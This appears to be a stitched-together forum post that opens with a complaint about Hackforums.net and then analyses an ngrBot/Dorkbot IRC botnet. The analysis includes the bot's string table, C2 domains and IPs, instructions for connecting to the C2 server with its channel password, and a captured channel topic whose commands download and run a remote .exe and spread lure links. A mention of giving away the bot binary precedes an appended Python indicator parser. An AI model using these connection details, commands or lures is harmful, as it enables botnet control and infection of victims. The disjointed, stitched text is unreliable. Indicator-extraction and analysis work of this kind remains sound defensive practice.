Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria is for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activities and it should be closed as soon as possible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

smellypussy.info (ngrBot, a very large IRC botnet hosted in the United States, Henderson, Trashy Media)

This botnet is a very big one and the bot used for spreading is also special:
a lot of features inside, like injection into multiple system processes, ruskill for killing processes, blocking AV updates and Windows security updates, MSN spread, FTP infection etc.

Sample was captured by Xylitol and then I helped with finding more IPs and different samples from the same botnet.

The bot is detected as Dorkbot

Here we go


Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

DNS used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]

Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]

Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]


How to connect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81

UPDATE:
Remote Host      Port   Note
204.15.252.199   49287  ircd here
208.75.230.43    80
213.251.170.52   80
61.31.99.67      4042   ircd here


Channel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol

NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422


Channel pass: ngrBot

The bin is for sale in underground forums for $400 but you can have it for free now.
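A small triage helper for captures like the channel topic and JOIN handshake shown above, added here as an example and not part of the original post or of the bot: it splits the topic into its `!command` arguments, pulls the URLs out as indicators, and flags NICK lines that follow the `new[COUNTRY|OS|HOSTNAME]` layout. The nick regex and the status-tag list are assumptions derived from the single sample in this post.

```python
import re

# Constructed inputs, copied from the capture in the write-up above
# (channel topic and the bot's IRC handshake); not from the bot itself.
TOPIC = ('!http.int 6 !http.set wowww!! hahahaha '
         'http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg '
         '!msn.int 6 !msn.set wowww!! hahahaha '
         'http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg '
         '!mdns http://www.freewebtown.com/usermx/av.txt '
         '!dl http://www.freewebtown.com/usermx/nbiz.exe -n !s')
HANDSHAKE = ['NICK new[USA|XP|COMPUTERNAME]zvbnyex',
             'USER hh "" "lol" :hh',
             'JOIN #newbiz#',
             'PONG 422']

# A '!name' token starts a command; its argument runs up to the next token.
CMD_RE = re.compile(r'!([a-z]+(?:\.[a-z]+)?)\s*(.*?)(?=\s!\w|$)')
URL_RE = re.compile(r'https?://\S+')
# Assumption: nick layout new[COUNTRY|OS|HOSTNAME] + lowercase alnum suffix,
# derived from the one nick in the capture.
NICK_RE = re.compile(r'^NICK new\[[A-Z]{2,3}\|[^|\]]+\|[^\]]+\][a-z0-9]{4,}$')
# Status tags the bot reports back to the channel (from the string table).
REPORT_TAGS = ('[Slowloris]', '[UDP]', '[SYN]', '[USB]', '[MSN]', '[HTTP]',
               '[DNS]', '[RSOCK4]', '[Ruskill]', '[PDef+]', '[FTP Login]',
               '[POP3 Login]', '[FTP Infect]', '[HTTP Login]', '[HTTP Traffic]')

def parse_topic(topic):
    """Split a channel topic into (command, argument) pairs."""
    return [(m.group(1), m.group(2).strip()) for m in CMD_RE.finditer(topic)]

def topic_urls(topic):
    """Collect every URL the topic points bots at (download/spread IoCs)."""
    return [u for _, arg in parse_topic(topic) for u in URL_RE.findall(arg)]

def is_infected_nick(line):
    """True if an IRC NICK line matches the bot's nick layout."""
    return NICK_RE.match(line) is not None

def is_bot_report(line):
    """True if a PRIVMSG body looks like one of the bot's status reports."""
    return line.startswith(REPORT_TAGS)

if __name__ == '__main__':
    for cmd, arg in parse_topic(TOPIC):
        print(f'{cmd:10} {arg}')
    print(topic_urls(TOPIC))
    print([l for l in HANDSHAKE if is_infected_nick(l)])
    print(is_bot_report('[USB]: Infected E:\\'))
```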